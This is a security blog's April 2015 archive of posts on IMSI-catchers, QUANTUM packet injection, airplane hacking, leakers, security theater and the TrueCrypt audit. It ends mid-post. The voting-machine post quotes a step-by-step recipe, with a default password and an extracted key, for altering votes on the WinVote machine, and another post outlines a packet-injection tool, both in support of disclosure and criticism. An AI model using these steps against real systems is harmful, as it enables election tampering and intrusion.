Blog: April 2015 Archives

Measuring the Expertise of Burglars

New research paper: “New methods for examining expertise in burglars in natural and simulated environments: preliminary findings“:

Expertise literature in mainstream cognitive psychology is rarely applied to criminal behaviour. Yet, if closely scrutinised, examples of the characteristics of expertise can be identified in many studies examining the cognitive processes of offenders, especially regarding residential burglary. We evaluated two new methodologies that might improve our understanding of cognitive processing in offenders through empirically observing offending behaviour and decision-making in a free-responding environment. We tested hypotheses regarding expertise in burglars in a small, exploratory study observing the behaviour of ‘expert’ offenders (ex-burglars) and novices (students) in a real and in a simulated environment. Both samples undertook a mock burglary in a real house and in a simulated house on a computer. Both environments elicited notably different behaviours between the experts and the novices with experts demonstrating superior skill. This was seen in: more time spent in high value areas; fewer and more valuable items stolen; and more systematic routes taken around the environments. The findings are encouraging and provide support for the development of these observational methods to examine offender cognitive processing and behaviour.

The lead researcher calls this “dysfunctional expertise,” but I disagree. It’s expertise.

Claire Nee, a researcher at the University of Portsmouth in the U.K., has been studying burglary and other crime for over 20 years. Nee says that the low clearance rate means that burglars often remain active, and some will even gain expertise in the crime. As with any job, practice results in skills. “By interviewing burglars over a number of years we’ve discovered that their thought processes become like experts in any field, that is they learn to automatically pick up cues in the environment that signify a successful burglary without even being aware of it. We call it ‘dysfunctional expertise,'” explains Nee.

See also this paper.

Posted on April 30, 2015 at 2:22 PM13 Comments

Protecting Against Google Phishing in Chrome

Google has a new Chrome extension called “Password Alert”:

To help keep your account safe, today we’re launching Password Alert, a free, open-source Chrome extension that protects your Google and Google Apps for Work Accounts. Once you’ve installed it, Password Alert will show you a warning if you type your Google password into a site that isn’t a Google sign-in page. This protects you from phishing attacks and also encourages you to use different passwords for different sites, a security best practice.

Here’s how it works for consumer accounts. Once you’ve installed and initialized Password Alert, Chrome will remember a “scrambled” version of your Google Account password. It only remembers this information for security purposes and doesn’t share it with anyone. If you type your password into a site that isn’t a Google sign-in page, Password Alert will show you a notice like the one below. This alert will tell you that you’re at risk of being phished so you can update your password and protect yourself.

It’s a clever idea. Of course it’s not perfect, and doesn’t completely solve the problem. But it’s an easy security improvement, and one that should be generalized to non-Google sites. (Although it’s not uncommon for the security of many passwords to be tied to the security of the e-mail account.) It reminds me somewhat of cert pinning; in both cases, the browser uses independent information to verify what the network is telling it.

Slashdot thread.

EDITED TO ADD: It’s not even a day old, and there’s an attack.

Posted on April 30, 2015 at 9:11 AM27 Comments

Nice Essay on Security Snake Oil

This is good:

Just as “data” is being sold as “intelligence”, a lot of security technologies are being sold as “security solutions” rather than what they for the most part are, namely very narrow focused appliances that as a best case can be part of your broader security effort.

Too many of these appliances do unfortunately not easily integrate with other appliances or with the rest of your security portfolio, or with your policies and procedures. Instead, they are created to work and be operated as completely stand-alone devices. This really is not what we need. To quote Alex Stamos, we need platforms. Reusable platforms that easily integrate with whatever else we decide to put into our security effort.

Slashdot thread.

Posted on April 28, 2015 at 6:21 AM12 Comments

The Further Democratization of Stingray

Stingray is the code name for an IMSI-catcher, which is basically a fake cell phone tower sold by Harris Corporation to various law enforcement agencies. (It’s actually just one of a series of devices with fish names—Amberjack is another—but it’s the name used in the media.) What is basically does is trick nearby cell phones into connecting to it. Once that happens, the IMSI-catcher can collect identification and location information of the phones and, in some cases, eavesdrop on phone conversations, text messages, and web browsing. (IMSI stands for International Mobile Subscriber Identity, which is the unique serial number your cell phone broadcasts so that the cellular system knows where you are.)

The use of IMSI-catchers in the US used to be a massive police secret. The FBI is so scared of explaining this capability in public that the agency makes local police sign nondisclosure agreements before using the technique, and has instructed them to lie about their use of it in court. When it seemed possible that local police in Sarasota, Florida, might release documents about Stingray cell phone interception equipment to plaintiffs in civil rights litigation against them, federal marshals seized the documents. More recently, St. Louis police dropped a case rather than talk about the technology in court. And Baltimore police admitted using Stingray over 25,000 times.

The truth is that it’s no longer a massive police secret. We now know a lot about IMSI-catchers. And the US government does not have a monopoly over the use of IMSI-catchers. I wrote in Data and Goliath:

There are dozens of these devices scattered around Washington, DC, and the rest of the country run by who-knows-what government or organization. Criminal uses are next.

From the Washington Post:

How rife? Turner and his colleagues assert that their specially outfitted smartphone, called the GSMK CryptoPhone, had detected signs of as many as 18 IMSI catchers in less than two days of driving through the region. A map of these locations, released Wednesday afternoon, looks like a primer on the geography of Washington power, with the surveillance devices reportedly near the White House, the Capitol, foreign embassies and the cluster of federal contractors near Dulles International Airport.

At the RSA Conference last week, Pwnie Express demonstrated their IMSI-catcher detector.

Building your own IMSI-catcher isn’t hard or expensive. At Def Con in 2010, researcher Chris Paget (now Kristin Paget) demonstrated a homemade IMSI-catcher. The whole thing cost $1,500, which is cheap enough for both criminals and nosy hobbyists.

It’s even cheaper and easier now. Anyone with a HackRF software-defined radio card can turn their laptop into an amateur IMSI-catcher. And this is why companies are building detectors into their security monitoring equipment.

Two points here. The first is that the FBI should stop treating Stingray like it’s a big secret, so we can start talking about policy.

The second is that we should stop pretending that this capability is exclusive to law enforcement, and recognize that we’re all at risk because of it. If we continue to allow our cellular networks to be vulnerable to IMSI-catchers, then we are all vulnerable to any foreign government, criminal, hacker, or hobbyist that builds one. If we instead engineer our cellular networks to be secure against this sort of attack, then we are safe against all those attackers.

Me:

We have one infrastructure. We can’t choose a world where the US gets to spy and the Chinese don’t. We get to choose a world where everyone can spy, or a world where no one can spy. We can be secure from everyone, or vulnerable to anyone.

Like QUANTUM, we have the choice of building our cellular infrastructure for security or for surveillance. Let’s choose security.

EDITED TO ADD (5/2): Here’s an IMSI catcher for sale on alibaba.com. At this point, every dictator in the world is using this technology against its own citizens. They’re used extensively in China to send SMS spam without paying the telcos any fees. On a Food Network show called Mystery Diners—episode 108, “Cabin Fever”—someone used an IMSI catcher to intercept a phone call between two restaurant employees.

The new model of the IMSI catcher from Harris Corporation is called Hailstorm. It has the ability to remotely inject malware into cell phones. Other Harris IMSI-catcher codenames are Kingfish, Gossamer, Triggerfish, Amberjack and Harpoon. The competitor is DRT, made by the Boeing subsidiary Digital Receiver Technology, Inc.

EDITED TO ADD (5/2): Here’s an IMSI catcher called Piranha, sold by the Israeli company Rayzone Corp. It claims to work on GSM 2G, 3G, and 4G networks (plus CDMA, of course). The basic Stingray only works on GSM 2G networks, and intercepts phones on the more modern networks by forcing them to downgrade to the 2G protocols. We believe that the more modern ISMI catchers also work against 3G and 4G networks.

EDITED TO ADD (5/13): The FBI recently released more than 5,000 pages of documents about Stingray, but nearly everything is redacted.

Posted on April 27, 2015 at 6:27 AM66 Comments

Federal Trade Commissioner Julie Brill on Obscurity

I think this is good:

Obscurity means that personal information isn’t readily available to just anyone. It doesn’t mean that information is wiped out or even locked up; rather, it means that some combination of factors makes certain types of information relatively hard to find.

Obscurity has always been an important component of privacy. It is a helpful concept because it encapsulates how a broad range of social, economic, and technological changes affects norms and consumer expectations.

Posted on April 24, 2015 at 12:42 PM14 Comments

The Further Democratization of QUANTUM

From my book Data and Goliath:

…when I was working with the Guardian on the Snowden documents, the one top-secret program the NSA desperately did not want us to expose was QUANTUM. This is the NSA’s program for what is called packet injection­—basically, a technology that allows the agency to hack into computers. Turns out, though, that the NSA was not alone in its use of this technology. The Chinese government uses packet injection to attack computers. The cyberweapons manufacturer Hacking Team sells packet injection technology to any government willing to pay for it. Criminals use it. And there are hacker tools that give the capability to individuals as well. All of these existed before I wrote about QUANTUM. By using its knowledge to attack others rather than to build up the Internet’s defenses, the NSA has worked to ensure that anyone can use packet injection to hack into computers.

And that’s true. China’s Great Cannon uses QUANTUM. The ability to inject packets into the backbone is a powerful attack technology, and one that is increasingly being used by different attackers.

I continued:

Even when technologies are developed inside the NSA, they don’t remain exclusive for long. Today’s top-secret programs become tomorrow’s PhD theses and the next day’s hacker tools.

I could have continued with “and the next day’s homework assignment,” because Michalis Polychronakis at Stony Book University has just assigned building a rudimentary QUANTUM tool as a homework assignment. It’s basically sniff, regexp match, swap sip/sport/dip/dport/syn/ack, set ack and push flags, and add the payload to create the malicious reply. Shouldn’t take more than a few hours to get it working. Of course, it would take a lot more to make it as sophisticated and robust as what the NSA and China have at their disposal, but the moral is that the tool is now in the hands of anyone who wants it. We need to make the Internet secure against this kind of attack instead of pretending that only the “good guys” can use it effectively.

End-to-end encryption is the solution. Nicholas Weaver wrote:

The only self defense from all of the above is universal encryption. Universal encryption is difficult and expensive, but unfortunately necessary.

Encryption doesn’t just keep our traffic safe from eavesdroppers, it protects us from attack. DNSSEC validation protects DNS from tampering, while SSL armors both email and web traffic.

There are many engineering and logistic difficulties involved in encrypting all traffic on the internet, but its one we must overcome if we are to defend ourselves from the entities that have weaponized the backbone.

Yes.

And this is true in general. We have one network in the world today. Either we build our communications infrastructure for surveillance, or we build it for security. Either everyone gets to spy, or no one gets to spy. That’s our choice, with the Internet, with cell phone networks, with everything.

Posted on April 24, 2015 at 8:55 AM46 Comments

An Incredibly Insecure Voting Machine

Wow:

The weak passwords—which are hard-coded and can’t be changed—were only one item on a long list of critical defects uncovered by the review. The Wi-Fi network the machines use is encrypted with wired equivalent privacy, an algorithm so weak that it takes as little as 10 minutes for attackers to break a network’s encryption key. The shortcomings of WEP have been so well-known that it was banished in 2004 by the IEEE, the world’s largest association of technical professionals. What’s more, the WINVote runs a version of Windows XP Embedded that hasn’t received a security patch since 2004, making it vulnerable to scores of known exploits that completely hijack the underlying machine. Making matters worse, the machine uses no firewall and exposes several important Internet ports.

It’s the AVS WinVote touchscreen Direct Recording Electronic (DRE). The Virginia Information Technology Agency (VITA) investigated the machine, and found that you could hack this machine from across the street with a smart phone:

So how would someone use these vulnerabilities to change an election?

  1. Take your laptop to a polling place, and sit outside in the parking lot.
  2. Use a free sniffer to capture the traffic, and use that to figure out the WEP password (which VITA did for us).
  3. Connect to the voting machine over WiFi.
  4. If asked for a password, the administrator password is “admin” (VITA provided that).
  5. Download the Microsoft Access database using Windows Explorer.
  6. Use a free tool to extract the hardwired key (“shoup”), which VITA also did for us.
  7. Use Microsoft Access to add, delete, or change any of the votes in the database.
  8. Upload the modified copy of the Microsoft Access database back to the voting machine.
  9. Wait for the election results to be published.

Note that none of the above steps, with the possible exception of figuring out the WEP password, require any technical expertise. In fact, they’re pretty much things that the average office worker does on a daily basis.

More.

Posted on April 23, 2015 at 7:19 AM70 Comments

"Hinky" in Action

In Beyond Fear I wrote about trained officials recognizing “hinky” and how it differs from profiling:

Ressam had to clear customs before boarding the ferry. He had fake ID, in the name of Benni Antoine Noris, and the computer cleared him based on this ID. He was allowed to go through after a routine check of his car’s trunk, even though he was wanted by the Canadian police. On the other side of the Strait of Juan de Fuca, at Port Angeles, Washington, Ressam was approached by U.S. customs agent Diana Dean, who asked some routine questions and then decided that he looked suspicious. He was fidgeting, sweaty, and jittery. He avoided eye contact. In Dean’s own words, he was acting “hinky.” More questioning—there was no one else crossing the border, so two other agents got involved—and more hinky behavior. Ressam’s car was eventually searched, and he was finally discovered and captured. It wasn’t any one thing that tipped Dean off; it was everything encompassed in the slang term “hinky.” But the system worked. The reason there wasn’t a bombing at LAX around Christmas in 1999 was because a knowledgeable person was in charge of security and paying attention.

I wrote about this again in 2007:

The key difference is expertise. People trained to be alert for something hinky will do much better than any profiler, but people who have no idea what to look for will do no better than random.

Here’s another story from last year:

On April 28, 2014, Yusuf showed up alone at the Minneapolis Passport Agency and applied for an expedited passport. He wanted to go “sightseeing” in Istanbul, where he was planning to meet someone he recently connected with on Facebook, he allegedly told the passport specialist.

“It’s a guy, just a friend,” he told the specialist, according to court documents.

But when the specialist pressed him for more information about his “friend” in Istanbul and his plans while there, Yusuf couldn’t offer any details, the documents allege.

“[He] became visibly nervous, more soft-spoken, and began to avoid eye contact,” the documents say. “Yusuf did not appear excited or happy to be traveling to Turkey for vacation.”

In fact, the passport specialist “found his interaction with Yusuf so unusual that he contacted his supervisor who, in turn, alerted the FBI to Yusuf’s travel,” according to the court documents.

This is what works. Not profiling. Not bulk surveillance. Not defending against any particular tactics or targets. In the end, this is what keeps us safe.

Posted on April 22, 2015 at 8:40 AM64 Comments

Hacking Airplanes

Imagine this: A terrorist hacks into a commercial airplane from the ground, takes over the controls from the pilots and flies the plane into the ground. It sounds like the plot of some “Die Hard” reboot, but it’s actually one of the possible scenarios outlined in a new Government Accountability Office report on security vulnerabilities in modern airplanes.

It’s certainly possible, but in the scheme of Internet risks I worry about, it’s not very high. I’m more worried about the more pedestrian attacks against more common Internet-connected devices. I’m more worried, for example, about a multination cyber arms race that stockpiles capabilities such as this, and prioritizes attack over defense in an effort to gain relative advantage. I worry about the democratization of cyberattack techniques, and who might have the capabilities currently reserved for nation-states. And I worry about a future a decade from now if these problems aren’t addressed.

First, the airplanes. The problem the GAO identifies is one computer security experts have talked about for years. Newer planes such as the Boeing 787 Dreamliner and the Airbus A350 and A380 have a single network that is used both by pilots to fly the plane and passengers for their Wi-Fi connections. The risk is that a hacker sitting in the back of the plane, or even one on the ground, could use the Wi-Fi connection to hack into the avionics and then remotely fly the plane.

The report doesn’t explain how someone could do this, and there are currently no known vulnerabilities that a hacker could exploit. But all systems are vulnerable—we simply don’t have the engineering expertise to design and build perfectly secure computers and networks—so of course we believe this kind of attack is theoretically possible.

Previous planes had separate networks, which is much more secure.

As terrifying as this movie-plot threat is—and it has been the plot of several recent works of fiction—this is just one example of an increasingly critical problem: As the computers already critical to running our infrastructure become connected, our vulnerability to cyberattack grows. We’ve already seen vulnerabilities in baby monitors, cars, medical equipment and all sorts of other Internet-connected devices. In February, Toyota recalled 1.9 million Prius cars because of a software vulnerability. Expect similar vulnerabilities in our smart thermostats, smart light bulbs and everything else connected to the smart power grid. The Internet of Things will bring computers into every aspect of our life and society. Those computers will be on the network and will be vulnerable to attack.

And because they’ll all be networked together, a vulnerability in one device will affect the security of everything else. Right now, a vulnerability in your home router can compromise the security of your entire home network. A vulnerability in your Internet-enabled refrigerator can reportedly be used as a launching pad for further attacks.

Future attacks will be exactly like what’s happening on the Internet today with your computer and smartphones, only they will be with everything. It’s all one network, and it’s all critical infrastructure.

Some of these attacks will require sufficient budget and organization to limit them to nation-state aggressors. But that’s hardly comforting. North Korea is last year believed to have launched a massive cyberattack against Sony Pictures. Last month, China used a cyberweapon called the “Great Cannon” against the website GitHub. In 2010, the U.S. and Israeli governments launched a sophisticated cyberweapon called Stuxnet against the Iranian Natanz nuclear power plant; it used a series of vulnerabilities to cripple centrifuges critical for separating nuclear material. In fact, the United States has done more to weaponize the Internet than any other country.

Governments only have a fleeting advantage over everyone else, though. Today’s top-secret National Security Agency programs become tomorrow’s Ph.D. theses and the next day’s hacker’s tools. So while remotely hacking the 787 Dreamliner’s avionics might be well beyond the capabilities of anyone except Boeing engineers today, that’s not going to be true forever.

What this all means is that we have to start thinking about the security of the Internet of Things—whether the issue in question is today’s airplanes or tomorrow’s smart clothing. We can’t repeat the mistakes of the early days of the PC and then the Internet, where we initially ignored security and then spent years playing catch-up. We have to build security into everything that is going to be connected to the Internet.

This is going to require both significant research and major commitments by companies. It’s also going to require legislation mandating certain levels of security on devices connecting to the Internet, and at network providers that make the Internet work. This isn’t something the market can solve on its own, because there are just too many incentives to ignore security and hope that someone else will solve it.

As a nation, we need to prioritize defense over offense. Right now, the NSA and U.S. Cyber Command have a strong interest in keeping the Internet insecure so they can better eavesdrop on and attack our enemies. But this prioritization cuts both ways: We can’t leave others’ networks vulnerable without also leaving our own vulnerable. And as one of the most networked countries on the planet, we are highly vulnerable to attack. It would be better to focus the NSA’s mission on defense and harden our infrastructure against attack.

Remember the GAO’s nightmare scenario: A hacker on the ground exploits a vulnerability in the airplane’s Wi-Fi system to gain access to the airplane’s network. Then he exploits a vulnerability in the firewall that separates the passengers’ network from the avionics to gain access to the flight controls. Then he uses other vulnerabilities both to lock the pilots out of the cockpit controls and take control of the plane himself.

It’s a scenario made possible by insecure computers and insecure networks. And while it might take a government-led secret project on the order of Stuxnet to pull it off today, that won’t always be true.

Of course, this particular movie-plot threat might never become a real one. But it is almost certain that some equally unlikely scenario will. I just hope we have enough security expertise to deal with whatever it ends up being.

This essay originally appeared on CNN.com.

EDITED TO ADD: News articles.

Posted on April 21, 2015 at 1:40 PM80 Comments

Hacker Detained by FBI after Tweeting about Airplane Software Vulnerabilities

This is troubling:

Chris Roberts was detained by FBI agents on Wednesday as he was deplaning his United flight, which had just flown from Denver to Syracuse, New York. While on board the flight, he tweeted a joke about taking control of the plane’s engine-indicating and crew-alerting system, which provides flight crews with information in real-time about an aircraft’s functions, including temperatures of various equipment, fuel flow and quantity, and oil pressure. In the tweet, Roberts jested: “Find myself on a 737/800, lets see Box-IFE-ICE-SATCOM, ? Shall we start playing with EICAS messages? ‘PASS OXYGEN ON’ Anyone ? :)” FBI agents questioned Roberts for four hours and confiscated his iPad, MacBook Pro, and storage devices.

Yes, the real issue here is the chilling effects on security research. Security researchers who point out security flaws is a good thing, and should be encouraged.

But to me, the fascinating part of this story is that a computer was monitoring the Twitter feed and understood the obscure references, alerted a person who figured out who wrote them, researched what flight he was on, and sent an FBI team to the Syracuse airport within a couple of hours. There’s some serious surveillance going on.

Now, it is possible that Roberts was being specifically monitored. He is already known as a security researcher who is working on avionics hacking. But still…

Slashdot thread. Hacker News thread.

EDITED TO ADD (4/22): Another article, this one about the debate over disclosing security vulnerabilities.

Posted on April 21, 2015 at 5:26 AM116 Comments

Counting the US Intelligence Community Leakers

It’s getting hard to keep track of the US intelligence community leakers without a scorecard. So here’s my attempt:

  • Leaker #1: Chelsea Manning.
  • Leaker #2: Edward Snowden.
  • Leaker #3: The person who leaked secret documents to Jake Appelbaum, Laura Poitras, and others in Germany: the Angela Merkel surveillance story, the TAO catalog, the X-KEYSCORE rules. My guess is that this is either an NSA employee or contractor working in Germany, or someone from German intelligence who has access to NSA documents. Snowden has said that he is not the source for the Merkel story, and Greenwald has confirmed that the Snowden documents are not the source for the X-KEYSCORE rules. This might be the “high-ranking NSA employee in Germany” from this story—or maybe that’s someone else entirely.
  • Leaker #4: “A source in the intelligence community,” according to the Intercept, who leaked information about the Terrorist Screening Database, the “second leaker” from the movie Citizen Four. Greenwald promises a lot from him: “Snowden, at a meeting with Greenwald in Moscow, expresses surprise at the level of information apparently coming from this new source. Greenwald, fearing he will be overheard, writes the details on scraps of paper.” We have seen nothing since, though. This is probably the leaker the FBI identified, although we have heard nothing further about that, either.
  • Leaker #5: Someone who is leaking CIA documents.
  • Leaker #6: The person who leaked secret information about WTO spying to the Intercept and the New Zealand Herald. This isn’t Snowden; the Intercept is very careful to identify him as the source when it writes about the documents he provided. Neither publication give any indication of how it was obtained. This might be Leaker #3, since it contains X-KEYSCORE rules.
  • Leaker #7: The person who just leaked secret information about the US drone program to the Intercept and Der Spiegel. This also might be Leaker #3, since there is a Germany connection. According to the Intercept: “The slides were provided by a source with knowledge of the U.S. government’s drone program who declined to be identified because of fears of retribution.” That implies someone new.

Am I missing anyone?

Harvard Law School professor Yochai Benkler has written an excellent law review article on the need for a whistleblower defense. And there’s this excellent article by David Pozen on why government leaks are, in general, a good thing. I wrote about the value of whistleblowers in Data and Goliath.

Way back in June 2013, Glenn Greenwald said that “courage is contagious.” He seems to be correct.

This post was originally published on the Lawfare blog.

EDITED TO ADD (4/22): News article.

In retrospect, I shouldn’t have included Manning in this list. I wanted it to be a list of active leaks, not historical leaks. And while Snowden is no longer leaking information, the reporters who received his documents are still releasing bits and pieces.

Posted on April 20, 2015 at 11:18 AM27 Comments

Metal Detectors at Sports Stadiums

Fans attending Major League Baseball games are being greeted in a new way this year: with metal detectors at the ballparks. Touted as a counterterrorism measure, they’re nothing of the sort. They’re pure security theater: They look good without doing anything to make us safer. We’re stuck with them because of a combination of buck passing, CYA thinking, and fear.

As a security measure, the new devices are laughable. The ballpark metal detectors are much more lax than the ones at an airport checkpoint. They aren’t very sensitive—people with phones and keys in their pockets are sailing through—and there are no X-ray machines. Bags get the same cursory search they’ve gotten for years. And fans wanting to avoid the detectors can opt for a “light pat-down search” instead.

There’s no evidence that this new measure makes anyone safer. A halfway competent ticketholder would have no trouble sneaking a gun into the stadium. For that matter, a bomb exploded at a crowded checkpoint would be no less deadly than one exploded in the stands. These measures will, at best, be effective at stopping the random baseball fan who’s carrying a gun or knife into the stadium. That may be a good idea, but unless there’s been a recent spate of fan shootings and stabbings at baseball games—and there hasn’t—this is a whole lot of time and money being spent to combat an imaginary threat.

But imaginary threats are the only ones baseball executives have to stop this season; there’s been no specific terrorist threat or actual intelligence to be concerned about. MLB executives forced this change on ballparks based on unspecified discussions with the Department of Homeland Security after the Boston Marathon bombing in 2013. Because, you know, that was also a sporting event.

This system of vague consultations and equally vague threats ensure that no one organization can be seen as responsible for the change. MLB can claim that the league and teams “work closely” with DHS. DHS can claim that it was MLB’s initiative. And both can safely relax because if something happens, at least they did something.

It’s an attitude I’ve seen before: “Something must be done. This is something. Therefore, we must do it.” Never mind if the something makes any sense or not.

In reality, this is CYA security, and it’s pervasive in post-9/11 America. It no longer matters if a security measure makes sense, if it’s cost-effective or if it mitigates any actual threats. All that matters is that you took the threat seriously, so if something happens you won’t be blamed for inaction. It’s security, all right—security for the careers of those in charge.

I’m not saying that these officials care only about their jobs and not at all about preventing terrorism, only that their priorities are skewed. They imagine vague threats, and come up with correspondingly vague security measures intended to address them. They experience none of the costs. They’re not the ones who have to deal with the long lines and confusion at the gates. They’re not the ones who have to arrive early to avoid the messes the new policies have caused around the league. And if fans spend more money at the concession stands because they’ve arrived an hour early and have had the food and drinks they tried to bring along confiscated, so much the better, from the team owners’ point of view.

I can hear the objections to this as I write. You don’t know these measures won’t be effective! What if something happens? Don’t we have to do everything possible to protect ourselves against terrorism?

That’s worst-case thinking, and it’s dangerous. It leads to bad decisions, bad design and bad security. A better approach is to realistically assess the threats, judge security measures on their effectiveness and take their costs into account. And the result of that calm, rational look will be the realization that there will always be places where we pack ourselves densely together, and that we should spend less time trying to secure those places and more time finding terrorist plots before they can be carried out.

So far, fans have been exasperated but mostly accepting of these new security measures. And this is precisely the problem—most of us don’t care all that much. Our options are to put up with these measures, or stay home. Going to a baseball game is not a political act, and metal detectors aren’t worth a boycott. But there’s an undercurrent of fear as well. If it’s in the name of security, we’ll accept it. As long as our leaders are scared of the terrorists, they’re going to continue the security theater. And we’re similarly going to accept whatever measures are forced upon us in the name of security. We’re going to accept the National Security Agency’s surveillance of every American, airport security procedures that make no sense and metal detectors at baseball and football stadiums. We’re going to continue to waste money overreacting to irrational fears.

We no longer need the terrorists. We’re now so good at terrorizing ourselves.

This essay previously appeared in the Washington Post.

Posted on April 15, 2015 at 6:58 AM99 Comments

Two Thoughtful Essays on the Future of Privacy

Paul Krugman argues that we’ll give up our privacy because we want to emulate the rich, who are surrounded by servants who know everything about them:

Consider the Varian rule, which says that you can forecast the future by looking at what the rich have today—that is, that what affluent people will want in the future is, in general, something like what only the truly rich can afford right now. Well, one thing that’s very clear if you spend any time around the rich—and one of the very few things that I, who by and large never worry about money, sometimes envy—is that rich people don’t wait in line. They have minions who ensure that there’s a car waiting at the curb, that the maitre-d escorts them straight to their table, that there’s a staff member to hand them their keys and their bags are already in the room.

And it’s fairly obvious how smart wristbands could replicate some of that for the merely affluent. Your reservation app provides the restaurant with the data it needs to recognize your wristband, and maybe causes your table to flash up on your watch, so you don’t mill around at the entrance, you just walk in and sit down (which already happens in Disney World.) You walk straight into the concert or movie you’ve bought tickets for, no need even to have your phone scanned. And I’m sure there’s much more—all kinds of context-specific services that you won’t even have to ask for, because systems that track you know what you’re up to and what you’re about to need.

Daniel C. Dennett and Deb Roy look at our loss of privacy in evolutionary terms, and see all sorts of adaptations coming:

The tremendous change in our world triggered by this media inundation can be summed up in a word: transparency. We can now see further, faster, and more cheaply and easily than ever before—and we can be seen. And you and I can see that everyone can see what we see, in a recursive hall of mirrors of mutual knowledge that both enables and hobbles. The age-old game of hide-and-seek that has shaped all life on the planet has suddenly shifted its playing field, its equipment and its rules. The players who cannot adjust will not last long.

The impact on our organizations and institutions will be profound. Governments, armies, churches, universities, banks and companies all evolved to thrive in a relatively murky epistemological environment, in which most knowledge was local, secrets were easily kept, and individuals were, if not blind, myopic. When these organizations suddenly find themselves exposed to daylight, they quickly discover that they can no longer rely on old methods; they must respond to the new transparency or go extinct. Just as a living cell needs an effective membrane to protect its internal machinery from the vicissitudes of the outside world, so human organizations need a protective interface between their internal affairs and the public world, and the old interfaces are losing their effectiveness.

Posted on April 14, 2015 at 6:32 AM49 Comments

China's Great Cannon

Citizen Lab has issued a report on China’s “Great Cannon” attack tool, used in the recent DDoS attack against GitHub.

We show that, while the attack infrastructure is co-located with the Great Firewall, the attack was carried out by a separate offensive system, with different capabilities and design, that we term the “Great Cannon.” The Great Cannon is not simply an extension of the Great Firewall, but a distinct attack tool that hijacks traffic to (or presumably from) individual IP addresses, and can arbitrarily replace unencrypted content as a man-in-the-middle.

The operational deployment of the Great Cannon represents a significant escalation in state-level information control: the normalization of widespread use of an attack tool to enforce censorship by weaponizing users. Specifically, the Cannon manipulates the traffic of “bystander” systems outside China, silently programming their browsers to create a massive DDoS attack. While employed for a highly visible attack in this case, the Great Cannon clearly has the capability for use in a manner similar to the NSA’s QUANTUM system, affording China the opportunity to deliver exploits targeting any foreign computer that communicates with any China-based website not fully utilizing HTTPS.

It’s kind of hard for the US to complain about this kind of thing, since we do it too.

More stories. Hacker News thread.

Posted on April 13, 2015 at 9:12 AM42 Comments

Alternatives to the FBI's Manufacturing of Terrorists

John Mueller suggests an alternative to the FBI’s practice of encouraging terrorists and then arresting them for something they would have never have planned on their own:

The experience with another case can be taken to suggest that there could be an alternative, and far less costly, approach to dealing with would-be terrorists, one that might generally (but not always) be effective at stopping them without actually having to jail them.

It involves a hothead in Virginia who ranted about jihad on Facebook, bragging about how “we dropped the twin towers.” He then told a correspondent in New Orleans that he was going to bomb the Washington, D.C. Metro the next day. Not wanting to take any chances and not having the time to insinuate an informant, the FBI arrested him. Not surprisingly, they found no bomb materials in his possession. Since irresponsible bloviating is not illegal (if it were, Washington would quickly become severely underpopulated), the police could only charge him with a minor crime—making an interstate threat. He received only a good scare, a penalty of time served and two years of supervised release.

That approach seems to have worked: the guy seems never to have been heard from again. It resembles the Secret Service’s response when they get a tip that someone has ranted about killing the president. They do not insinuate an encouraging informant into the ranter’s company to eventually offer crucial, if bogus, facilitating assistance to the assassination plot. Instead, they pay the person a Meaningful Visit and find that this works rather well as a dissuasion device. Also, in the event of a presidential trip to the ranter’s vicinity, the ranter is visited again. It seems entirely possible that this approach could productively be applied more widely in terrorism cases. Ranting about killing the president may be about as predictive of violent action as ranting about the virtues of terrorism to deal with a political grievance. The terrorism cases are populated by many such ranters­—indeed, tips about their railing have frequently led to FBI involvement. It seems likely, as apparently happened in the Metro case, that the ranter could often be productively deflected by an open visit from the police indicating that they are on to him. By contrast, sending in a paid operative to worm his way into the ranter’s confidence may have the opposite result, encouraging, even gulling, him toward violence.

Posted on April 10, 2015 at 10:33 AM37 Comments

Lone-Wolf Terrorism

The Southern Poverty Law Center warns of the rise of lone-wolf terrorism.

From a security perspective, lone wolves are much harder to prevent because there is no conspiracy to detect.

The long-term trend away from violence planned and committed by groups and toward lone wolf terrorism is a worrying one. Authorities have had far more success penetrating plots concocted by several people than individuals who act on their own. Indeed, the lone wolf’s chief asset is the fact that no one else knows of his plans for violence and they are therefore exceedingly difficult to disrupt.

[…]

The temptation to focus on horrific groups like Al Qaeda and the Islamic State is wholly understandable. And the federal government recently has taken steps to address the terrorist threat more comprehensively, with Attorney General Eric Holder announcing the coming reconstitution of the Domestic Terrorism Executive Committee. There has been a recent increase in funding for studies of terrorism and radicalization, and the FBI has produced a number of informative reports.

And Holder seems to understand clearly that lone wolves and small cells are an increasing threat. “It’s something that frankly keeps me up at night, worrying about the lone wolf or a group of people, a very small group of people, who decide to get arms on their own and do what we saw in France,” he said recently.

Jim Harper of the Cato Institute wrote about this in 2009 after the Fort Hood shooting.

Posted on April 8, 2015 at 10:15 AM58 Comments

Cell Phone Opsec

Here’s an article on making secret phone calls with cell phones.

His step-by-step instructions for making a clandestine phone call are as follows:

  1. Analyze your daily movements, paying special attention to anchor points (basis of operation like home or work) and dormant periods in schedules (8-12 p.m. or when cell phones aren’t changing locations);
  2. Leave your daily cell phone behind during dormant periods and purchase a prepaid no-contract cell phone (“burner phone”);
  3. After storing burner phone in a Faraday bag, activate it using a clean computer connected to a public Wi-Fi network;
  4. Encrypt the cell phone number using a onetime pad (OTP) system and rename an image file with the encrypted code. Using Tor to hide your web traffic, post the image to an agreed upon anonymous Twitter account, which signals a communications request to your partner;
  5. Leave cell phone behind, avoid anchor points, and receive phone call from partner on burner phone at 9:30 p.m.­—or another pre-arranged “dormant” time­—on the following day;
  6. Wipe down and destroy handset.

    Note that it actually makes sense to use a one-time pad in this instance. The message is a ten-digit number, and a one-time pad is easier, faster, and cleaner than using any computer encryption program.

    Posted on April 7, 2015 at 9:27 AM77 Comments

    TrueCrypt Security Audit Completed

    The security audit of the TrueCrypt code has been completed (see here for the first phase of the audit), and the results are good. Some issues were found, but nothing major.

    From Matthew Green, who is leading the project:

    The TL;DR is that based on this audit, Truecrypt appears to be a relatively well-designed piece of crypto software. The NCC audit found no evidence of deliberate backdoors, or any severe design flaws that will make the software insecure in most instances.

    That doesn’t mean Truecrypt is perfect. The auditors did find a few glitches and some incautious programming—leading to a couple of issues that could, in the right circumstances, cause Truecrypt to give less assurance than we’d like it to.

    Nothing that would make me not use the program, though.

    Slashdot thread.

    Posted on April 3, 2015 at 1:14 PM80 Comments

    The Eighth Movie-Plot Threat Contest

    It’s April 1, and time for another Movie-Plot Threat Contest. This year, the theme is Crypto Wars II. Strong encryption is evil, because it prevents the police from solving crimes. (No, really—that’s the argument.) FBI Director James Comey is going to be hard to beat with his heartfelt litany of movie-plot threats:

